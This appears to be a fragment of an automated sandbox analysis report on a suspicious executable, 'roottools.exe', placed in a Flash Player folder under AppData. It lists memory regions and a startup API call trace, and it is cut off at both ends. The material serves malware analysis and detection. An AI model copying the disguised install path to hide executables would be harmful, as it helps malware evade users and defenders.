AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:00010636" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1571 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1572 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1573 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1574 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1575 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 1576 start_va = 0x400000 end_va = 0x432fff entry_point = 0x400000 region_type = mapped_file name = "roottools.exe" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe") Region: id = 1577 start_va = 0x77090000 end_va = 0x77238fff entry_point = 0x77090000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1578 start_va = 0x77270000 end_va = 0x773effff entry_point = 0x77270000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1579 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1580 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1581 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1582 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1583 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1584 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1585 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1586 start_va = 0x190000 end_va = 0x193fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1587 start_va = 0x2f0000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 1588 start_va = 0x746f0000 end_va = 0x746f7fff entry_point = 0x746f0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1589 start_va = 0x74700000 end_va = 0x7475bfff entry_point = 0x74700000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1590 start_va = 0x74760000 end_va = 0x7479efff entry_point = 0x74760000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1591 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1592 start_va = 0x1a0000 end_va = 0x206fff entry_point = 0x1a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1593 start_va = 0x590000 end_va = 0x68ffff entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 1594 start_va = 0x860000 end_va = 0x86ffff entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1595 start_va = 0x72940000 end_va = 0x72a92fff entry_point = 0x72940000 region_type = mapped_file name = "msvbvm60.dll" filename = "\\Windows\\SysWOW64\\msvbvm60.dll" (normalized: "c:\\windows\\syswow64\\msvbvm60.dll") Region: id = 1596 start_va = 0x74dc0000 end_va = 0x74dcbfff entry_point = 0x74dc0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1597 start_va = 0x74dd0000 end_va = 0x74e2ffff entry_point = 0x74dd0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1598 start_va = 0x74e90000 end_va = 0x74ea8fff entry_point = 0x74e90000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1599 start_va = 0x75130000 end_va = 0x751bffff entry_point = 0x75130000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1600 start_va = 0x75250000 end_va = 0x75295fff entry_point = 0x75250000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1601 start_va = 0x752a0000 end_va = 0x7534bfff entry_point = 0x752a0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1602 start_va = 0x75450000 end_va = 0x755abfff entry_point = 0x75450000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1603 start_va = 0x755b0000 end_va = 0x7564cfff entry_point = 0x755b0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1604 start_va = 0x756e0000 end_va = 0x7577ffff entry_point = 0x756e0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1605 start_va = 0x75780000 end_va = 0x75789fff entry_point = 0x75780000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1606 start_va = 0x75790000 end_va = 0x7588ffff entry_point = 0x75790000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1607 start_va = 0x759f0000 end_va = 0x75afffff entry_point = 0x759f0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1608 start_va = 0x76b60000 end_va = 0x76beefff entry_point = 0x76b60000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1609 start_va = 0x76d80000 end_va = 0x76e6ffff entry_point = 0x76d80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1610 start_va = 0x76e70000 end_va = 0x76f69fff entry_point = 0x0 region_type = private name = "private_0x0000000076e70000" filename = "" Region: id = 1611 start_va = 0x76f70000 end_va = 0x7708efff entry_point = 0x0 region_type = private name = "private_0x0000000076f70000" filename = "" Region: id = 1612 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1613 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1614 start_va = 0x690000 end_va = 0x817fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 1615 start_va = 0x74e30000 end_va = 0x74e8ffff entry_point = 0x74e30000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1616 start_va = 0x75b00000 end_va = 0x75bcbfff entry_point = 0x75b00000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1617 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1618 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1619 start_va = 0x870000 end_va = 0x9f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 1620 start_va = 0xa00000 end_va = 0x1dfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a00000" filename = "" Region: id = 1621 start_va = 0x210000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 1622 start_va = 0x1e00000 end_va = 0x21fffff entry_point = 0x0 region_type = private name = "private_0x0000000001e00000" filename = "" Region: id = 1623 start_va = 0x2200000 end_va = 0x24cefff entry_point = 0x2200000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1624 start_va = 0x24d0000 end_va = 0x26fffff entry_point = 0x0 region_type = private name = "private_0x00000000024d0000" filename = "" Region: id = 1625 start_va = 0x440000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 1626 start_va = 0x74660000 end_va = 0x746dffff entry_point = 0x74660000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1627 start_va = 0x24d0000 end_va = 0x263ffff entry_point = 0x0 region_type = private name = "private_0x00000000024d0000" filename = "" Region: id = 1628 start_va = 0x26c0000 end_va = 0x26fffff entry_point = 0x0 region_type = private name = "private_0x00000000026c0000" filename = "" Region: id = 1629 start_va = 0x440000 end_va = 0x51efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1630 start_va = 0x540000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1631 start_va = 0x210000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 1632 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 1633 start_va = 0x210000 end_va = 0x21ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 1634 start_va = 0x250000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 1635 start_va = 0x74940000 end_va = 0x7499efff entry_point = 0x74940000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\SysWOW64\\sxs.dll" (normalized: "c:\\windows\\syswow64\\sxs.dll") Region: id = 1636 start_va = 0x74640000 end_va = 0x74652fff entry_point = 0x74640000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 1637 start_va = 0x220000 end_va = 0x226fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 1638 start_va = 0x230000 end_va = 0x231fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 1639 start_va = 0x2700000 end_va = 0x2af2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002700000" filename = "" Region: id = 1640 start_va = 0x2b00000 end_va = 0x342ffff entry_point = 0x2b00000 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 1641 start_va = 0x370000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 1642 start_va = 0x75c50000 end_va = 0x76899fff entry_point = 0x75c50000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1643 start_va = 0x750d0000 end_va = 0x75126fff entry_point = 0x750d0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1644 start_va = 0x74920000 end_va = 0x7493bfff entry_point = 0x74920000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 1645 start_va = 0x77240000 end_va = 0x77245fff entry_point = 0x77240000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 1646 start_va = 0x74910000 end_va = 0x74916fff entry_point = 0x74910000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 1647 start_va = 0x240000 end_va = 0x247fff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 1648 start_va = 0x748f0000 end_va = 0x74901fff entry_point = 0x748f0000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc.dll") Region: id = 1649 start_va = 0x75890000 end_va = 0x758c4fff entry_point = 0x75890000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 1650 start_va = 0x24d0000 end_va = 0x253ffff entry_point = 0x0 region_type = private name = "private_0x00000000024d0000" filename = "" Region: id = 1651 start_va = 0x2600000 end_va = 0x263ffff entry_point = 0x0 region_type = private name = "private_0x0000000002600000" filename = "" Region: id = 1652 start_va = 0x260000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 1653 start_va = 0x3430000 end_va = 0x352ffff entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 1654 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 1655 start_va = 0x3530000 end_va = 0xb52ffff entry_point = 0x0 region_type = private name = "private_0x0000000003530000" filename = "" Region: id = 1656 start_va = 0x400000 end_va = 0x41bfff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1657 start_va = 0x758d0000 end_va = 0x759ecfff entry_point = 0x758d0000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 1658 start_va = 0x750c0000 end_va = 0x750cbfff entry_point = 0x750c0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 1659 start_va = 0x74eb0000 end_va = 0x74eb4fff entry_point = 0x74eb0000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 1660 start_va = 0x75350000 end_va = 0x75444fff entry_point = 0x75350000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 1661 start_va = 0x76c40000 end_va = 0x76d75fff entry_point = 0x76c40000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 1662 start_va = 0x74ec0000 end_va = 0x750bafff entry_point = 0x74ec0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 1663 start_va = 0x748e0000 end_va = 0x748e7fff entry_point = 0x748e0000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 1664 start_va = 0xb530000 end_va = 0xb79ffff entry_point = 0x0 region_type = private name = "private_0x000000000b530000" filename = "" Region: id = 1665 start_va = 0x748c0000 end_va = 0x748d5fff entry_point = 0x748c0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 1666 start_va = 0x2b0000 end_va = 0x2ebfff entry_point = 0x2b0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1667 start_va = 0x2b0000 end_va = 0x2ebfff entry_point = 0x2b0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1668 start_va = 0x2b0000 end_va = 0x2ebfff entry_point = 0x2b0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1669 start_va = 0x2b0000 end_va = 0x2ebfff entry_point = 0x2b0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1670 start_va = 0x2b0000 end_va = 0x2ebfff entry_point = 0x2b0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1671 start_va = 0x74880000 end_va = 0x748bafff entry_point = 0x74880000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1672 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 2089 start_va = 0x2540000 end_va = 0x257ffff entry_point = 0x0 region_type = private name = "private_0x0000000002540000" filename = "" Region: id = 2090 start_va = 0xb7a0000 end_va = 0xb89ffff entry_point = 0x0 region_type = private name = "private_0x000000000b7a0000" filename = "" Region: id = 2091 start_va = 0x7efad000 end_va = 0x7efaffff entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Thread: id = 108 os_tid = 0x97c [0083.709] GetVersion () returned 0x1db10106 [0083.711] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x759f0000 [0083.711] GetProcAddress (hModule=0x759f0000, lpProcName="IsTNT") returned 0x0 [0083.711] VirtualAlloc (lpAddress=0x0, dwSize=0x400000, flAllocationType=0x2000, flProtect=0x4) returned 0x1e00000 [0083.712] VirtualAlloc (lpAddress=0x1e00000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x1e00000 [0083.713] GetCurrentThreadId () returned 0x97c [0083.713] GetCommandLineA () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe\"" [0083.713] GetEnvironmentStringsW () returned 0x5a4cf8* [0083.713] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1486, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1486 [0083.713] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1486, lpMultiByteStr=0x2a07d0, cbMultiByte=1486, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=::=::\\", lpUsedDefaultChar=0x0) returned 1486 [0083.713] FreeEnvironmentStringsW (penv=0x5a4cf8) returned 1 [0083.713] GetStartupInfoA (in: lpStartupInfo=0x18f9b8 | out: lpStartupInfo=0x18f9b8*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0083.713] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0083.713] GetFileType (hFile=0x0) returned 0x0 [0083.713] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0083.713] GetFileType (hFile=0x0) returned 0x0 [0083.713] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0083.713] GetFileType (hFile=0x0) returned 0x0 [0083.713] SetHandleCount (uNumber=0x20) returned 0x20 [0083.713] GetACP () returned 0x4e4 [0083.713] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f9e0 | out: lpCPInfo=0x18f9e0) returned 1 [0083.713] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72a4c528, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe")) returned 0x6e [0083.714] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x759f0000 [0083.714] GetProcAddress (hModule=0x759f0000, lpProcName="IsProcessorFeaturePresent") returned 0x75a05235 [0083.714] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0083.714] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x7c [0083.715] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x80 [0083.715] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0083.715] GetModuleFileNameA (in: hModule=0x72940000, lpFilename=0x72a4e6c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\MSVBVM60.DLL" (normalized: "c:\\windows\\system32\\msvbvm60.dll")) returned 0x20 [0083.715] GetVersion () returned 0x1db10106 [0083.715] lstrcmpiW (lpString1="A", lpString2="B") returned -1 [0083.716] GetUserDefaultLCID () returned 0x409 [0083.716] CompareStringW (Locale=0x409, dwCmpFlags=0x30001, lpString1="A", cchCount1=-1, lpString2="B", cchCount2=-1) returned 1 [0083.716] GetSystemMetrics (nIndex=5) returned 1 [0083.716] GetSystemMetrics (nIndex=6) returned 1 [0083.716] GetSystemMetrics (nIndex=11) returned 32 [0083.717] GetSystemMetrics (nIndex=12) returned 32 [0083.717] GetSystemMetrics (nIndex=34) returned 132 [0083.717] GetSystemMetrics (nIndex=35) returned 38 [0083.717] GetSystemMetrics (nIndex=0) returned 1440 [0083.717] GetSystemMetrics (nIndex=1) returned 900 [0083.717] GetSystemMetrics (nIndex=32) returned 8 [0083.717] GetSystemMetrics (nIndex=33) returned 8 [0083.717] GetSystemMetrics (nIndex=42) returned 0 [0083.717] GetStockObject (i=15) returned 0x188000b [0083.717] GetStockObject (i=7) returned 0x1b00017 [0083.717] GetStockObject (i=6) returned 0x1b00018 [0083.717] GetStockObject (i=8) returned 0x1b00016 [0083.717] GetStockObject (i=4) returned 0x1900011 [0083.717] GetStockObject (i=2) returned 0x1900012 [0083.717] GetStockObject (i=0) returned 0x1900010 [0083.717] GetStockObject (i=5) returned 0x1900015 [0083.717] GetStockObject (i=13) returned 0x18a002e [0083.717] GetDC (hWnd=0x0) returned 0xffffffffc3010960 [0083.717] GetTextExtentPointA (in: hdc=0xc3010960, lpString="0", c=1, lpsz=0x18f9dc | out: lpsz=0x18f9dc) returned 1 [0083.719] GetDeviceCaps (hdc=0xc3010960, index=14) returned 1 [0083.719] GetDeviceCaps (hdc=0xc3010960, index=12) returned 32 [0083.719] GetDeviceCaps (hdc=0xc3010960, index=88) returned 96 [0083.719] GetDeviceCaps (hdc=0xc3010960, index=90) returned 96 [0083.719] GetDeviceCaps (hdc=0xc3010960, index=38) returned 32409 [0083.719] ReleaseDC (hWnd=0x0, hDC=0xc3010960) returned 1 [0083.719] CoGetMalloc (in: dwMemContext=0x1, ppMalloc=0x72a4e7d0 | out: ppMalloc=0x72a4e7d0*=0x755966bc) returned 0x0 [0083.720] GetCurrentThreadId () returned 0x97c [0083.720] GetStartupInfoA (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0083.720] GetCurrentThreadId () returned 0x97c [0083.720] GetCurrentThreadId () returned 0x97c [0083.720] GetCommandLineA () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe\"" [0083.720] lstrlenA (lpString="") returned 0 [0083.720] lstrcpyA (in: lpString1=0x18feac, lpString2="" | out: lpString1="") returned="" [0083.720] SetErrorMode (uMode=0x8001) returned 0x0 [0083.720] GetModuleFileNameA (in: hModule=0x72940000, lpFilename=0x18fb68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\MSVBVM60.DLL" (normalized: "c:\\windows\\system32\\msvbvm60.dll")) returned 0x20 [0083.720] GetUserDefaultLCID () returned 0x409 [0083.720] lstrcpyA (in: lpString1=0x18f868, lpString2="*" | out: lpString1="*") returned="*" [0083.720] LoadStringA (in: hInstance=0x72940000, uID=0x7d1, lpBuffer=0x18fc6c, cchBufferMax=8 | out: lpBuffer="409") returned 0x3 [0083.720] GetSystemDefaultLCID () returned 0x409 [0083.720] GetUserDefaultLCID () returned 0x409 [0083.720] GetLocaleInfoA (in: Locale=0x400, LCType=0xe, lpLCData=0x18fc76, cchData=2 | out: lpLCData=".") returned 2 [0083.720] GetStockObject (i=13) returned 0x18a002e [0083.720] GetObjectA (in: h=0x18a002e, c=60, pv=0x18fc3c | out: pv=0x18fc3c) returned 60 [0083.720] GetLocaleInfoA (in: Locale=0x409, LCType=0x80000003, lpLCData=0x18fc38, cchData=4 | out: lpLCData="ENU") returned 4 [0083.720] lstrcpyA (in: lpString1=0x18fc68, lpString2="EN" | out: lpString1="EN") returned="EN" [0083.720] lstrlenA (lpString="{xx}") returned 4 [0083.720] lstrlenA (lpString="VB98.CHM") returned 8 [0083.720] lstrcpyA (in: lpString1=0x72a4eae8, lpString2="VB98.CHM" | out: lpString1="VB98.CHM") returned="VB98.CHM" [0083.720] GetLocaleInfoA (in: Locale=0x409, LCType=0x80000003, lpLCData=0x18fc38, cchData=4 | out: lpLCData="ENU") returned 4 [0083.721] lstrcpyA (in: lpString1=0x18fc68, lpString2="EN" | out: lpString1="EN") returned="EN" [0083.721] lstrlenA (lpString="{xx}") returned 4 [0083.721] lstrlenA (lpString="VBENLR98.CHM") returned 12 [0083.721] lstrcpyA (in: lpString1=0x72a4ebf0, lpString2="VBENLR98.CHM" | out: lpString1="VBENLR98.CHM") returned="VBENLR98.CHM" [0083.721] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x18fd90, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe")) returned 0x6e [0083.721] GetModuleFileNameA (in: hModule=0x72940000, lpFilename=0x18fc8c, nSize=0x104 | out: 